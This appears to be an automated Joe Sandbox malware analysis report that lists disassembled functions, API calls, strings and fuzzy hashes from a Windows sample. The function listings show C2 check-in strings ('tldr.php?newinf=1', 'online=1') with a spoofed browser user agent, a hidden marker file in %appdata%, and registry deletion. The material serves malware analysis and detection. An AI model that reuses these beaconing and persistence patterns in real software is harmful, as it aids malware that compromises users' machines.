Opcode Fuzzy Hash: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
Instruction Fuzzy Hash: 9CB19B71604304EFDB00CF64E888A6ABBF5FF88304F448A6AF9498B221D775DD55CB5A

Function 004212B0 Relevance: 21.3, APIs: 14, Instructions: 279windowCOMMON

Download Yara Rule

APIs

GetClipBox.GDI32(?,?), ref: 004212DA
SetBkColor.GDI32(?,00000001), ref: 0042132A
SetBkColor.GDI32(?,?), ref: 0042133F
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
SetBkColor.GDI32(?,00000000), ref: 00421367
DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
DrawFrameControl.USER32(?,00000004,00000004,?), ref: 004213F0
CopyRect.USER32(?,?), ref: 00421461
SetTextColor.GDI32(?,?), ref: 004214CC
DrawTextA.USER32(?,?,000000FF,?,00000010), ref: 0042154A
SetTextColor.GDI32(?,?), ref: 00421567
SetTextColor.GDI32(?,00000000), ref: 004215F2
DrawFocusRect.USER32(?,?), ref: 0042160D

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Color$Text$Draw$Rect$ClipControlCopyEdgeFocusFrameOffset
String ID:
API String ID: 2048994688-0
Opcode ID: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
Instruction ID: d2e7032c405a87bda436ebbee9352e43b21f8cfe9bd8d6afaaa75e2085407c70
Opcode Fuzzy Hash: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
Instruction Fuzzy Hash: 8CC12775604205DFDB04CF18D884A6ABBF6FF88310F588A69F8898B3A5D770ED44CB55

Function 00401CDA Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 55networksleepCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401CF1
_snprintf.MSVCRT ref: 00401D15
_snprintf.MSVCRT ref: 00401D39
InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00401D4E
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00401D78
Sleep.KERNEL32(000003E8), ref: 00401D86
InternetCloseHandle.WININET(00000001), ref: 00401D8F
InternetCloseHandle.WININET(00000000), ref: 00401D9B

Strings

%stldr.php?newinf=1, xrefs: 00401D04
%stldr.php?online=1, xrefs: 00401D28
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00401D49

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Internet$CloseHandleOpen_snprintf$Sleepmemset
String ID: %stldr.php?newinf=1$%stldr.php?online=1$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
API String ID: 3400190714-2874531546
Opcode ID: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
Instruction ID: 172d5a9b1eb5bcf93a70bdf7b9922c54f139c7de0db3159d92bce3780515f997
Opcode Fuzzy Hash: 88955e9700e802a41a336eaddde6b3c6a87df646c806fd4a3ba7a8a57b138e3a
Instruction Fuzzy Hash: 9711A7B0E4031CBBEF11ABA0CD47FDA3A78AB04B04F1444B6B754B91E1D6B49A94CF59

Function 00404687 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 70sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00404678
Sleep.KERNEL32(00000064), ref: 004046A3
memset.MSVCRT ref: 004046B7
_snprintf.MSVCRT ref: 004046DD
Sleep.KERNEL32(00000064), ref: 004046FA
Sleep.KERNEL32(00000064), ref: 00404721
memset.MSVCRT ref: 00404735
_snprintf.MSVCRT ref: 00404762
CreateThread.KERNEL32(00000000,00000000,00402DF9,?,00000000,00000000), ref: 00404792

Strings

%s%s, xrefs: 00404751
x, xrefs: 00404694

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Sleep$_snprintfmemset$CreateThread
String ID: %s%s$x
API String ID: 3185671098-918306452
Opcode ID: 3223238570f32b9aa77b3ec0efea89e6ebf1555110f4e8c578895ea75ee811a0
Instruction ID: 53edad24388d98d4bc92df8c35b0c357ffc742b0aeb58214580d6d560269df2a
Opcode Fuzzy Hash: 3223238570f32b9aa77b3ec0efea89e6ebf1555110f4e8c578895ea75ee811a0
Instruction Fuzzy Hash: 3C2183B1A40298AFDB109B91ED46FD97278AB05700F4004B6F249F60C1D7B85AD4CF19

Function 00401FAC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401FC3
memset.MSVCRT ref: 00401FD9
ExpandEnvironmentStringsW.KERNEL32(%appdata%,?,00000208), ref: 00401FF2
_snwprintf.MSVCRT ref: 00402010
PathFileExistsW.SHLWAPI(?), ref: 0040201F
_wfopen.MSVCRT ref: 00402035
fclose.MSVCRT ref: 00402051
SetFileAttributesW.KERNEL32(?,00000007), ref: 00402060

Strings

%appdata%, xrefs: 00401FED
%ls\winsvcs_.txt, xrefs: 00401FFF

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Filememset$AttributesEnvironmentExistsExpandPathStrings_snwprintf_wfopenfclose
String ID: %appdata%$%ls\winsvcs_.txt
API String ID: 1073927619-2399589006
Opcode ID: e84ac5780f314c49fbe05951a747f9916237b8ab93540f80218f68c5d7e039d5
Instruction ID: 1a380fa9675f0f2fc8ef9a6445bbc20ecbefda1fb14ea0c07b927e82b87ac6b4
Opcode Fuzzy Hash: e84ac5780f314c49fbe05951a747f9916237b8ab93540f80218f68c5d7e039d5
Instruction Fuzzy Hash: 621137B194031C66DF20EB609D0EFDB73BCAB04704F0444B6B354F60D2EAB896C48E59

Function 0041A790 Relevance: 16.6, APIs: 11, Instructions: 142registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00136788,?,00000000,?,00135518), ref: 0041A7D0
RegCloseKey.ADVAPI32(?), ref: 0041A7E8
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A83B
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A881
RegCloseKey.ADVAPI32(?), ref: 0041A89E
GetModuleHandleA.KERNEL32(0043AC38), ref: 0041A8D1
GetProcAddress.KERNEL32(00000000,0043AC48), ref: 0041A8E1
RegCloseKey.ADVAPI32(?), ref: 0041A91D
RegCloseKey.ADVAPI32(?), ref: 0041A937
RegDeleteKeyA.ADVAPI32(00136788,?), ref: 0041A956
RegCloseKey.ADVAPI32(?), ref: 0041A96C

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Close$Enum$AddressDeleteHandleModuleOpenProc
String ID:
API String ID: 2624191705-0
Opcode ID: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
Instruction ID: 83ba429f44283625fc5b112b12f706557ec537738ca58ebf2211737b90b5b4cc
Opcode Fuzzy Hash: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
Instruction Fuzzy Hash: 5C51A375A05348AFD7359F25DC44BEB77F8FB89354F00482AF98882250D7B48D94CBA6

Function 00401DA3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 91comsleepCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00401DB1
CoCreateInstance.OLE32(004051FC,00000000,00000001,004051EC,?), ref: 00401DC9
VariantInit.OLEAUT32(?), ref: 00401DE0
VariantInit.OLEAUT32(?), ref: 00401E1B
VariantInit.OLEAUT32(?), ref: 00401E32
Sleep.KERNEL32(000003E8), ref: 00401E71
CoUninitialize.OLE32 ref: 00401E8D

Strings

p=Dv, xrefs: 00401DE0, 00401E1B, 00401E32

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: InitVariant$CreateInitializeInstanceSleepUninitialize
String ID: p=Dv
API String ID: 4283135408-1270568779
Opcode ID: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
Instruction ID: 208c781282a30cfd99823755e06e75eb4e8dd7f2476d9e837450959f1c20ea48
Opcode Fuzzy Hash: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
Instruction Fuzzy Hash: 4931D035900608AFDB01DFA8D949BCEBBB9EF0D320F504066E901FB2A0D7B1A9448F64

Function 004281EA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004423C0,0000000C,00428325,00000000,00000000), ref: 004281FC
__crt_waiting_on_module_handle.LIBCMT ref: 00428207

Part of subcall function 0042AD25: Sleep.KERNEL32(000003E8,00000000,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD31
Part of subcall function 0042AD25: GetModuleHandleW.KERNEL32(?,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD3A

__lock.LIBCMT ref: 00428262
InterlockedIncrement.KERNEL32(004491E8), ref: 0042826F
__lock.LIBCMT ref: 00428283
___addlocaleref.LIBCMT ref: 004282A1

Strings

KERNEL32.DLL, xrefs: 004281F6, 004281FB, 00428206

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: KERNEL32.DLL
API String ID: 4021795732-2576044830
Opcode ID: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
Instruction ID: 71b69992fdd27ed05a877e38898eabb59d78cf734761bb36ba796b392924f269
Opcode Fuzzy Hash: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
Instruction Fuzzy Hash: 2211D570A41B11DFE710DF36A905B5EBBF0AF04314F50556FE89992390CB789900CB6C

Function 004137D7 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 00413821
SetWindowLongA.USER32(?,000000FC,?), ref: 0041382F
IsWindow.USER32(?), ref: 00413862
GetCurrentProcess.KERNEL32 ref: 004138AC
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 004138B6
SetWindowLongA.USER32(?,000000FC,?), ref: 004138C2
GetWindowLongA.USER32(?,000000FC), ref: 0041394F
SetWindowLongA.USER32(?,000000FC,?), ref: 0041395D

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Window$Long$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 2416140278-0
Opcode ID: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
Instruction ID: 53fdc4dda89daccb099a69e9506e87e8d6b252ccccbd8fdd27d7c1450a31b40a
Opcode Fuzzy Hash: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
Instruction Fuzzy Hash: E451B5702047009BD7305F25DC48B67BBE5FF44715F048A2EF4AA822E1D7B4AE41C718

Function 00417549 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 004175AD
SysStringLen.OLEAUT32 ref: 004175BA
SysStringLen.OLEAUT32 ref: 004175C7
_memcpy_s.LIBCMT ref: 004175E5

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: String$Free_memcpy_s
String ID:
API String ID: 2083054645-0
Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99

Function 0042B460 Relevance: 9.3, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0042B561
__FindPESection.LIBCMT ref: 0042B57B

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8

Function 00418F70 Relevance: 9.1, APIs: 6, Instructions: 114stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,00000000,?), ref: 00418F91
lstrlenW.KERNEL32(?,00000000,80070057), ref: 00418FA9
_memcpy_s.LIBCMT ref: 00418FDB
_memcpy_s.LIBCMT ref: 00419018

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: _memcpy_slstrlen
String ID:
API String ID: 2392212498-0
Opcode ID: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
Instruction ID: 48a8b0cc39821948161f5f9393556796c921f6ff3b7309816e02544d4b83d9d4
Opcode Fuzzy Hash: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
Instruction Fuzzy Hash: 6B3106B16042119FE730AF22EC81A777BA8EB95314F14483EF98582211EA7AEC81C759

Function 00414E99 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00414EF5
SelectObject.GDI32(00000000,00000000), ref: 00414F37
DeleteObject.GDI32(00000000), ref: 00414F45
FillRect.USER32(?,?,00000006), ref: 00414F63

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ObjectRect$ClientDeleteFillSelect
String ID:
API String ID: 3522820569-0
Opcode ID: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
Instruction ID: 865ed62e204f999886674634bdac8c5fb271fad3e2ed5c8a8075e854c35c8e72
Opcode Fuzzy Hash: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
Instruction Fuzzy Hash: C43182762043029FD3109B28EC48BA7BBB9FFD4311F04552AF94986320DB76DC91CB65

Function 00411A09 Relevance: 9.1, APIs: 6, Instructions: 78threadCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411A19
GetCurrentThreadId.KERNEL32 ref: 00411A29
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411A4A
GetCurrentProcess.KERNEL32 ref: 00411A8E
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411A98
SetWindowLongA.USER32(?,00000004,?), ref: 00411AA5

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
String ID:
API String ID: 3823208529-0
Opcode ID: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
Instruction ID: 37a676f5cb27032d0318369953a16ba400cad8c49294232363eb4eb626f908f1
Opcode Fuzzy Hash: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
Instruction Fuzzy Hash: A821A132301310AFD7208FA5D8C4A27BFA4FF48714B08896AEA498B211C774EC41CB75

Function 00411F4C Relevance: 9.1, APIs: 6, Instructions: 78threadCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411F59
GetCurrentThreadId.KERNEL32 ref: 00411F69
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411F8A
GetCurrentProcess.KERNEL32 ref: 00411FCE
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411FD8
SetWindowLongA.USER32(?,000000FC,?), ref: 00411FE5

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
String ID:
API String ID: 3823208529-0
Opcode ID: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
Instruction ID: 12e269af356ffb42e89dcecac3084760c7acb0868c2f02fce1b83a7edaf6f50e
Opcode Fuzzy Hash: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
Instruction Fuzzy Hash: DA219232304310AFD7209FA5EDC4E27BBA4FB487147188A6AEE498B266C775DC41CB75

Function 004157E2 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?), ref: 00415827
ClientToScreen.USER32(?,?), ref: 00415839
GetParent.USER32(?), ref: 00415842
ScreenToClient.USER32(00000000), ref: 00415850
ScreenToClient.USER32(00000000,?), ref: 00415860
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00415884

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ClientScreen$MoveParentWindow
String ID:
API String ID: 2420994850-0
Opcode ID: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
Instruction ID: cb2595f71ca4477885d93d82fefb541c649833f727a180719ed1214593514184
Opcode Fuzzy Hash: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
Instruction Fuzzy Hash: 0B214C72104202AFD701DF55DC84AABFBE8FF88350F04892DF98887260D771AC51CB65

Function 004290C5 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004290ED

Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810

__getptd.LIBCMT ref: 004290F7

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 00429105
__getptd.LIBCMT ref: 00429113
__getptd.LIBCMT ref: 0042911E
_CallCatchBlock2.LIBCMT ref: 00429144

Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5

Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58

Function 00415189 Relevance: 7.7, APIs: 5, Instructions: 243COMMON

Download Yara Rule

APIs

SetLayeredWindowAttributes.USER32 ref: 0041525D

Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790

GetClientRect.USER32(?,?), ref: 0041541E
GetClientRect.USER32(?,?), ref: 0041542B
GetParent.USER32(?), ref: 00415454
CreateAcceleratorTableA.USER32(?,00000001), ref: 0041549D

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ClientRect$AcceleratorAttributesCreateCriticalInitializeLayeredParentSectionTableWindow
String ID:
API String ID: 3375822417-0
Opcode ID: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
Instruction ID: 6c39a8f56b411056154fd32cd0cf0432356b21fcc375bf42b615943a6af84bd3
Opcode Fuzzy Hash: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
Instruction Fuzzy Hash: 45A10271605B01DFD750CF29C484B9ABBE0FF88714F148A6EE8899B351D7B5E881CB86

Function 00418DF0 Relevance: 7.6, APIs: 5, Instructions: 140stringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
lstrlenW.KERNEL32(00000000), ref: 00418E26
_malloc.LIBCMT ref: 00418E87
WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D

Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CriticalSection$ByteCharEnterErrorFreeHeapLastLeaveMultiWide___sbh_find_block___sbh_free_block__lock_malloclstrlen
String ID:
API String ID: 2649083834-0
Opcode ID: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
Instruction ID: ef69da5e920178eb1dcc70a03244176e842f214767484c64cd14ef8785300be5
Opcode Fuzzy Hash: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
Instruction Fuzzy Hash: 6E41E271B002159BDB048EA89C80BAB77669B94314F04827EFD18DB391DE78DD4587C9

Function 004100C0 Relevance: 7.6, APIs: 5, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00410127
std::_String_base::_Xlen.LIBCPMT ref: 004100D5

Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D

std::_String_base::_Xlen.LIBCPMT ref: 0041014F
_memmove_s.LIBCMT ref: 0041018C
_memmove_s.LIBCMT ref: 004101D7

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 2104318304-0
Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9

Function 00418CB0 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
String ID:
API String ID: 2896116776-0
Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9

Function 00416E20 Relevance: 7.6, APIs: 5, Instructions: 108windowCOMMON

Download Yara Rule
